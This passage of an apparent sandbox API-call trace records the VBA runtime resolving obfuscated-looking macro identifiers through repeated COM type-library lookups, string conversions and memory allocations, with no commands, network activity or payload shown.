pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.092] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.092] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.092] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.092] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.092] IUnknown:Release (This=0x665ba50) returned 0xd [0069.092] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.092] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.092] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.092] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.092] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.092] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.093] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.093] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.093] IUnknown:Release (This=0x665ba50) returned 0xd [0069.093] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.093] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.093] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.093] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.093] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.093] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.093] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.093] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.093] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.093] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.093] IUnknown:Release (This=0x665ba50) returned 0xd [0069.093] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.093] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.093] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.093] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.093] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.093] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.093] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.094] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.094] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.094] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.094] IUnknown:Release (This=0x665ba50) returned 0xd [0069.094] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.094] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.094] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.094] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4e10000 [0069.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6230e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAwDA") returned 8 [0069.095] ITypeComp:RemoteBind (in: This=0x665ba60, szName="PADAwDA", lHashVal=0x105eb1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6230e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAwDA") returned 8 [0069.095] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="PADAwDA", lHashVal=0x105eb1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6230e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAwDA") returned 8 [0069.095] ITypeComp:RemoteBind (in: This=0x665bd30, szName="PADAwDA", lHashVal=0x105eb1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.095] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PADAwDA") returned 0x105eb1 [0069.095] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="PADAwDA" | out: _Dst="PADAwDA") returned 0x0 [0069.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="PADAwDA") returned 8 [0069.095] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.096] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="PADAwDA", lHashVal=0x105eb1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.096] IUnknown:Release (This=0x665ba50) returned 0xd [0069.096] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.096] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="PADAwDA", lHashVal=0x105eb1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.096] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.096] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.096] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="PADAwDA", lHashVal=0x105eb1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.096] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.096] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.096] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="PADAwDA", lHashVal=0x105eb1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.096] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6230e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PADAwDA") returned 8 [0069.096] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="PADAwDA", lHashVal=0x105eb1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.096] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.096] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6230e | out: _Dst=0x67c2d40) returned 0x0 [0069.096] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_PADAwDA") returned 0x1052b4 [0069.096] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_PADAwDA" | out: _Dst="_B_var_PADAwDA") returned 0x0 [0069.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_PADAwDA") returned 15 [0069.096] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.096] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_PADAwDA", lHashVal=0x1052b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.096] IUnknown:Release (This=0x665ba50) returned 0xd [0069.096] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.096] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_PADAwDA", lHashVal=0x1052b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.096] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.096] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.096] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_PADAwDA", lHashVal=0x1052b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.097] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.097] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.097] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_PADAwDA", lHashVal=0x1052b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.097] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.097] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.097] IUnknown:Release (This=0x665ba50) returned 0xd [0069.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1109e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_PADAwDA") returned 15 [0069.097] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_PADAwDA", lHashVal=0x1052b4, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0) returned 0x0 [0069.097] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6230e | out: _Dst=0x144ec0) returned 0x0 [0069.097] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QDUkUX", lHashVal=0x102104, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QDUkUX") returned 7 [0069.097] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QDUkUX", lHashVal=0x102104, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QDUkUX") returned 7 [0069.097] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QDUkUX", lHashVal=0x102104, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.097] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QDUkUX") returned 0x102104 [0069.097] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QDUkUX" | out: _Dst="QDUkUX") returned 0x0 [0069.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QDUkUX") returned 7 [0069.097] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.098] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QDUkUX", lHashVal=0x102104, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.098] IUnknown:Release (This=0x665ba50) returned 0xd [0069.098] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.098] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QDUkUX", lHashVal=0x102104, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.098] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.098] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.098] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QDUkUX", lHashVal=0x102104, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.098] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.098] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.098] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QDUkUX", lHashVal=0x102104, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.098] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QDUkUX") returned 7 [0069.098] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QDUkUX", lHashVal=0x102104, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.098] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.098] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a623fe | out: _Dst=0x67c2d40) returned 0x0 [0069.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QDUkUX") returned 0x109bad [0069.098] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QDUkUX" | out: _Dst="_B_var_QDUkUX") returned 0x0 [0069.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QDUkUX") returned 14 [0069.098] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.098] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QDUkUX", lHashVal=0x109bad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.098] IUnknown:Release (This=0x665ba50) returned 0xd [0069.098] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.098] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QDUkUX", lHashVal=0x109bad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.098] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.098] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.098] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QDUkUX", lHashVal=0x109bad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.098] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.098] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.099] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QDUkUX", lHashVal=0x109bad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.099] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.099] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.099] IUnknown:Release (This=0x665ba50) returned 0xd [0069.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b110ce, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_QDUkUX") returned 14 [0069.099] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QDUkUX", lHashVal=0x109bad, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x55006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x55006b00000000, pDummy=0x0) returned 0x0 [0069.099] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a623fe | out: _Dst=0x144ec0) returned 0x0 [0069.099] ITypeComp:RemoteBind (in: This=0x665ba60, szName="bUUZcA_", lHashVal=0x104fe4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623d6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bUUZcA_") returned 8 [0069.099] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="bUUZcA_", lHashVal=0x104fe4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623d6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bUUZcA_") returned 8 [0069.099] ITypeComp:RemoteBind (in: This=0x665bd30, szName="bUUZcA_", lHashVal=0x104fe4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.099] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bUUZcA_") returned 0x104fe4 [0069.099] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="bUUZcA_" | out: _Dst="bUUZcA_") returned 0x0 [0069.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="bUUZcA_") returned 8 [0069.099] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.099] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="bUUZcA_", lHashVal=0x104fe4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.099] IUnknown:Release (This=0x665ba50) returned 0xd [0069.099] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.099] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="bUUZcA_", lHashVal=0x104fe4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.099] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.100] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.100] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="bUUZcA_", lHashVal=0x104fe4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.100] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.100] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.100] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="bUUZcA_", lHashVal=0x104fe4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.100] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623d6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bUUZcA_") returned 8 [0069.100] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="bUUZcA_", lHashVal=0x104fe4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.100] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.100] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a623d6 | out: _Dst=0x67c2d40) returned 0x0 [0069.100] LHashValOfNameSysA (syskind=0x3, lcid=0x409, 